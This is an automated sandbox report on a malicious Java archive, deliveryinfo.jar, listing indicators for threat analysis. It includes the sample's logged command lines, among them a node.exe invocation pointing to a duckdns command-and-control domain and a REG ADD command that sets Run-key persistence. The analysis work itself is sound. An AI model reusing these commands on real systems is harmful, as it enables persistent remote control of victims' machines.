analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

deliveryinfo.jar

Full analysis: https://app.any.run/tasks/69b5f90c-a108-492e-91e2-cc47f6913d4f
Verdict: Malicious activity
Analysis date: September 30, 2020, 02:49:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

724141C6922AB8E19C262D269AA8AEE1

SHA1:

0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0

SHA256:

A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D

SSDEEP:

12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 2432)
  • SUSPICIOUS

    • Executes JAVA applets

      • javaw.exe (PID: 3656)
    • Executable content was dropped or overwritten

      • javaw.exe (PID: 3360)
    • Creates files in the user directory

      • javaw.exe (PID: 3360)
    • Application launched itself

      • javaw.exe (PID: 3656)
      • node.exe (PID: 3460)
      • node.exe (PID: 3132)
    • Starts CMD.EXE for commands execution

      • node.exe (PID: 3932)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 2788)
    • Reads CPU info

      • node.exe (PID: 3932)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 3360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipFileName: META-INF/
ZipUncompressedSize: -
ZipCompressedSize: 2
ZipCRC: 0x00000000
ZipModifyDate: 2020:09:25 16:24:26
ZipCompression: Deflated
ZipBitFlag: 0x0808
ZipRequiredVersion: 20
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
0
Suspicious processes
5

Behavior graph

Click at the process to see the details
start javaw.exe no specs javaw.exe node.exe node.exe no specs node.exe cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
3656"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exeexplorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
3360"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\91203cef.tmpC:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
javaw.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
3460C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
javaw.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
3132C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exenode.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Version:
14.12.0
3932C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
node.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Version:
14.12.0
2788C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""C:\Windows\system32\cmd.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2432REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""C:\Windows\system32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
39
Read events
38
Write events
1
Delete events
0

Modification events

(PID) Process:(2432) reg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:75f43e1b-f848-4a9d-9715-4f0bfcbdd71a
Value:
cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
Executable files
2
Suspicious files
2
Text files
3 668
Unknown types
7

Dropped files

PID
Process
Filename
Type
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node.exe
MD5:
SHA256:
3360javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:9FF345D67D3E86AA13748F32859F0623
SHA256:D580EB3395C1986C8BE63EA57F27C03102506A465A4B060C6FA252DB908BDE09
3656javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:3B0324B3E0F429E28588DE1DF7C625AA
SHA256:9660032A03EA9330665C227ECDB00A0C316F73914C3B684A142E805F7AE0DC2C
3656javaw.exeC:\Users\admin\AppData\Local\Temp\91203cef.tmpjava
MD5:724141C6922AB8E19C262D269AA8AEE1
SHA256:A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.mailmaptext
MD5:50FF5F4745B5210D1DDC6CB3AD21216B
SHA256:EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.licensee.jsontext
MD5:B133415ABE39E5C1865AAD84712B3941
SHA256:66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.travis.ymltext
MD5:3A7ED115415E15A00FC5911C72DA7812
SHA256:B4080A2F674C7036830858C9EF6731BE83CC210B2C13ADE7CC4C9567163615CC
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\nodevars.battext
MD5:E6636C5B093F5CC13DFB7508305B8D8B
SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
3360javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\install_tools.battext
MD5:2CD17E6D9A33A0BD00C2E18E6D41BC6F
SHA256:C7C05DE977EEFD931B54B482405C87A2F002AF3BC83A9C2FECA21B05915983B9
3360javaw.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2fdbf
MD5:C8366AE350E7019AEFC9D1E6E6A498C6
SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3460
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
3932
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
3360
javaw.exe
104.20.22.46:443
nodejs.org
Cloudflare Inc
US
shared
3932
node.exe
95.217.228.176:443
wtfismyip.com
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
nodejs.org
  • 104.20.22.46
  • 104.20.23.46
whitelisted
hazeman222.duckdns.org
  • 94.156.189.108
malicious
wtfismyip.com
  • 95.217.228.176
shared

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures available at the full report
No debug info